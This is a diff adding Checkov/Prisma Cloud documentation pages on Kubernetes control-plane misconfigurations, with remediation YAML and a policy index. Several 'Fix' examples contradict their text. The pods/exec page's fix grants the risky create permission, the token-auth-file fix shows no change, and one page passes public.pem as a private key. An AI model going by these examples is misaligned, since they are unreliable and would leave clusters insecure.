--feature-gates=RotateKubeletServerCertificate=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0.adoc new file mode 100644 index 000000000..744a556a9 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0.adoc @@ -0,0 +1,65 @@ +== The --secure-port argument is set to 0 +// '--secure-port' argument set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f249eee4-5695-43a9-bf08-0372dda79ce6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py[CKV_K8S_89] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not disable the secure port. +The secure port is used to serve https with authentication and authorization. +If you disable it, no https traffic is served and all traffic is served unencrypted. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --secure-port=80 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..15a973c37 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc @@ -0,0 +1,66 @@ +== The --service-account-key-file argument is not set appropriately +// '--service-account-key-file' argument not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 85a7d846-9c95-46be-9368-6c9091604505 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py[CKV_K8S_97] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Explicitly set a service account public key file for service accounts on the apiserver. +By default, if no --service-account-key-file is specified to the apiserver, it uses the private key from the TLS serving certificate to verify service account tokens. +To ensure that the keys for service account tokens could be rotated as needed, a separate public/private key pair should be used for signing service account tokens. +Hence, the public key should be specified to the apiserver with --service-account-key-file. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --service-account-key-file=/keys/key.pem + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc new file mode 100644 index 000000000..666a1b893 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc @@ -0,0 +1,66 @@ +== The --service-account-lookup argument is not set to true +// '--service-account-lookup' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 498e4ff0-b3aa-40b3-a6f3-0e2ca2429322 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py[CKV_K8S_96] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Validate service account before validating token. +If `--service-account-lookup` is not enabled, the apiserver only verifies that the authentication token is valid, and does not validate that the service account token mentioned in the request is actually present in etcd. +This allows using a service account token even after the corresponding service account is deleted. +This is an example of time of check to time of use security issue. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --service-account-lookup=true + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..11d652ee9 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc @@ -0,0 +1,64 @@ +== The --service-account-private-key-file argument for controller managers is not set appropriately +// '--service-account-private-key-file' argument for controller managers not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 28873c1a-82d2-4390-9e59-ca4e99a709e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py[CKV_K8S_110] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Explicitly set a service account private key file for service accounts on the controller manager. +To ensure that keys for service account tokens can be rotated as needed, a separate public/private key pair should be used for signing service account tokens. +The private key should be specified to the controller manager with --service-account-private-key-file as appropriate. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --service-account-private-key-file=public.pem + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc new file mode 100644 index 000000000..997d1c25c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc @@ -0,0 +1,66 @@ +== The --streaming-connection-idle-timeout argument is set to 0 +// '-streaming-connection-idle-timeout' argument set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 87d48757-cb0e-4662-b1a4-063eb0ecc807 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py[CKV_K8S_143] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not disable timeouts on streaming connections. +Setting idle timeouts ensures that you are protected against Denial-of-Service attacks, inactive connections and running out of ephemeral ports. +By default, --streaming-connection-idle-timeout is set to 4 hours which might be too high for your environment. +Setting this as appropriate would addition ally ensure that such streaming connections are timed out after serving legitimate use cases. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --streaming-connection-idle-timeout=1 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..e5c26d524 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc @@ -0,0 +1,98 @@ +== The --terminated-pod-gc-threshold argument for controller managers is not set appropriately +// '--terminated-pod-gc-threshold' argument for controller managers not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5572ef68-3823-48f9-b2d0-e17d6d002366 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py[CKV_K8S_106] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Activate garbage collector on pod termination, as appropriate.. +Garbage collection is important to ensure sufficient resource availability and avoiding degraded performance and availability. +In the worst case, the system might crash or just be unusable for a long period of time. +The current setting for garbage collection is 12,500 terminated pods which might be too high for your system to sustain. +Based on your system resources and tests, choose an appropriate threshold value to activate garbage collection. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --terminated-pod-gc-threshold=555 + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-controller-manager-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc new file mode 100644 index 000000000..b2e1e98b5 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc @@ -0,0 +1,66 @@ +== The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately +// 'The '--tls-cert-file' and '--tls-private-key-file' arguments for Kubelet not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2d52b41d-84d8-4afc-8533-50053491e28f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py[CKV_K8S_148] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +API server communication contains sensitive parameters that should remain encrypted in transit. +Configure the API server to serve only HTTPS traffic by setup TLS connection on the API server. +By default, --tls-cert-file and --tls-private-key-file arguments are not set. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system + spec: + containers: + - command: + - kube-apiserver ++ - --tls-cert-file=/path/to/cert ++ - --tls-private-key-file=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..ace69d197 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,97 @@ +== The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately +// '--tls-cert-file' and '--tls-private-key-file' arguments for API server not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 00a6ace3-35ea-4d46-9814-221875ffcd47 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py[CKV_K8S_100] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +API server communication contains sensitive parameters that should remain encrypted in transit. +Configure the API server to serve only HTTPS traffic by setup TLS connection on the API server. +By default, --tls-cert-file and --tls-private-key-file arguments are not set. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system + spec: + containers: + - command: + - kube-apiserver ++ - --tls-cert-file=/path/to/cert ++ - --tls-private-key-file=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set.adoc new file mode 100644 index 000000000..bdbd229ec --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set.adoc @@ -0,0 +1,96 @@ +== The --token-auth-file argument is Set +// 'The '--token-auth-file' argument is set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2972e238-4811-41dd-947c-2a52f1512e80 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py[CKV_K8S_70] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not use token based authentication. +The token-based authentication utilizes static tokens to authenticate requests to the apiserver. +The tokens are stored in clear-text in a file on the apiserver, and cannot be revoked or rotated without restarting the apiserver. +Hence, do not use static token-based authentication. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc new file mode 100644 index 000000000..1118a6d0b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc @@ -0,0 +1,65 @@ +== The --use-service-account-credentials argument for controller managers is not set to True +// '--use-service-account-credentials' argument for controller managers not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e74ba43b-4375-4df3-93c1-f9b5858d9b8d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py[CKV_K8S_108] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Use individual service account credentials for each controller. +The controller manager creates a service account per controller in the kube-system namespace, generates a credential for it, and builds a dedicated API client with that service account credential for each controller loop to use. +Setting the --use-service-account- credentials to true runs each control loop within the controller manager using a separate service account credential. +When used in combination with RBAC, this ensures that the control loops run with the minimum permissions required to perform their intended tasks. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --use-service-account-credentials=true + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-the-rotatekubeletservercertificate-argument-for-kubelets-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-the-rotatekubeletservercertificate-argument-for-kubelets-is-set-to-true.adoc new file mode 100644 index 000000000..3d58f43e3 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-the-rotatekubeletservercertificate-argument-for-kubelets-is-set-to-true.adoc @@ -0,0 +1,43 @@ +== Ensure the RotateKubeletServerCertificate argument for kubelets is set to True +// Ensure the 'RotateKubeletServerCertificate' argument for kubelets is set to True + +=== Description + + +Enable kubelet server certificate rotation. +RotateKubeletServerCertificate causes the kubelet to both request a serving certificate after bootstrapping its client credentials and rotate the certificate as its existing credentials expire. +This automated periodic rotation ensures that the there are no downtimes due to expired certificates and thus addressing availability in the CIA security triad. + +NOTE: This recommendation only applies if you let kubelets get their certificates from the API server. In case your kubelet certificates come from an outside authority/tool (e.g.Vault) then you need to take care of rotation yourself. + + +=== Fix - Buildtime + + +*Kubernetes *Kind:* Pod* + + + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --feature-gates=RotateKubeletServerCertificate=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc new file mode 100644 index 000000000..4c5613a4b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc @@ -0,0 +1,56 @@ +== Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1adf8c5c-67c2-498b-9022-fba893151928 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml[CKV2_K8S_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, granting the create permission to the nodes/proxy or pods/exec sub resources can potentially allow privilege escalation. +This is because these sub resources enable users to access and control the Kubernetes nodes and pods in the cluster. +If a user has the create permission for the nodes/proxy sub resource, they would be able to create a proxy to any node in the cluster. +This would allow them to access the node as if they were directly logged in to it, potentially giving them access to sensitive information or allowing them to perform actions that they are not supposed to be able to perform. +Similarly, if a user has the create permission for the pods/exec sub resource, they would be able to execute commands on any pod in the cluster. +This could allow them to gain access to the containers running on the pod, potentially giving them access to sensitive information or allowing them to perform unauthorized actions. +Therefore, it is important to carefully consider whether to grant the create permission for the nodes/proxy and pods/exec sub resources, as doing so could potentially allow privilege escalation. +It may be safer to only grant these permissions to trusted users who have a legitimate need for them, and to monitor their usage to ensure that they are not being used for unauthorized purposes. + +=== Fix - Buildtime + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: ClusterRole +metadata: + name: restricted-access +rules: +- apiGroups: [""] + resources: ["nodes/proxy", "pods/exec"] + verbs: ["create"]", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/kubernetes-policy-index.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/kubernetes-policy-index.adoc new file mode 100644 index 000000000..d6fd0d470 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/kubernetes-policy-index.adoc @@ -0,0 +1,593 @@ +== Kubernetes Policy Index + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-k8s-1.adoc[Containers wishing to share host process ID namespace admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py[CKV_K8S_1] +|MEDIUM + + +|xref:bc-k8s-10.adoc[CPU limits are not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/CPULimits.py[CKV_K8S_11] +|LOW + + +|xref:bc-k8s-11.adoc[Memory requests are not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py[CKV_K8S_12] +|LOW + + +|xref:bc-k8s-12.adoc[Memory limits are not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py[CKV_K8S_13] +|LOW + + +|xref:bc-k8s-13.adoc[Image tag is not set to Fixed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py[CKV_K8S_14] +|LOW + + +|xref:bc-k8s-14.adoc[Image pull policy is not set to Always] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py[CKV_K8S_15] +|LOW + + +|xref:bc-k8s-15.adoc[Container is privileged] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py[CKV_K8S_16] +|HIGH + + +|xref:bc-k8s-16.adoc[Containers share host process ID namespace] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py[CKV_K8S_17] +|MEDIUM + + +|xref:bc-k8s-17.adoc[Containers share host IPC namespace] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py[CKV_K8S_18] +|MEDIUM + + +|xref:bc-k8s-18.adoc[Containers share the host network namespace] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py[CKV_K8S_19] +|MEDIUM + + +|xref:bc-k8s-19.adoc[Containers run with AllowPrivilegeEscalation] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py[CKV_K8S_20] +|MEDIUM + + +|xref:bc-k8s-2.adoc[Privileged containers are admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py[CKV_K8S_2] +|HIGH + + +|xref:bc-k8s-20.adoc[Default namespace is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py[CKV_K8S_21] +|LOW + + +|xref:bc-k8s-21.adoc[Read-Only filesystem for containers is not used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py[CKV_K8S_22] +|LOW + + +|xref:bc-k8s-22.adoc[Admission of root containers not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainers.py[CKV_K8S_23] +|MEDIUM + + +|xref:bc-k8s-23.adoc[Containers with added capability are allowed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py[CKV_K8S_24] +|LOW + + +|xref:bc-k8s-24.adoc[Admission of containers with added capability is not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py[CKV_K8S_25] +|LOW + + +|xref:bc-k8s-25.adoc[hostPort is specified] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/HostPort.py[CKV_K8S_26] +|LOW + + +|xref:bc-k8s-26.adoc[Mounting Docker socket daemon in a container is not limited] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py[CKV_K8S_27] +|MEDIUM + + +|xref:bc-k8s-27.adoc[Admission of containers with NET_RAW capability is not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py[CKV_K8S_28] +|LOW + + +|xref:bc-k8s-28.adoc[securityContext is not applied to pods and containers in container context] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py[CKV_K8S_30] +|LOW + + +|xref:bc-k8s-29.adoc[seccomp is not set to Docker/Default or Runtime/Default] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Seccomp.py[CKV_K8S_31] +|LOW + + +|xref:bc-k8s-3.adoc[Containers wishing to share host IPC namespace admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py[CKV_K8S_3] +|MEDIUM + + +|xref:bc-k8s-30.adoc[seccomp profile is not set to Docker/Default or Runtime/Default] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py[CKV_K8S_32] +|LOW + + +|xref:bc-k8s-31.adoc[Kubernetes dashboard is deployed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py[CKV_K8S_33] +|LOW + + +|xref:bc-k8s-32.adoc[Tiller (Helm V2) is deployed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Tiller.py[CKV_K8S_34] +|LOW + + +|xref:bc-k8s-33.adoc[Secrets used as environment variables] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/Secrets.py[CKV_K8S_35] +|LOW + + +|xref:bc-k8s-34.adoc[Admission of containers with capabilities assigned is not limited] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py[CKV_K8S_37] +|LOW + + +|xref:bc-k8s-35.adoc[Service account tokens are not mounted where necessary] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py[CKV_K8S_38] +|LOW + + +|xref:bc-k8s-36.adoc[CAP_SYS_ADMIN Linux capability is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py[CKV_K8S_39] +|HIGH + + +|xref:bc-k8s-37.adoc[Containers do not run with a high UID] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py[CKV_K8S_40] +|LOW + + +|xref:bc-k8s-38.adoc[Default service accounts are actively used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py[CKV_K8S_41] +|LOW + + +|xref:bc-k8s-39.adoc[Images are not selected using a digest] +| 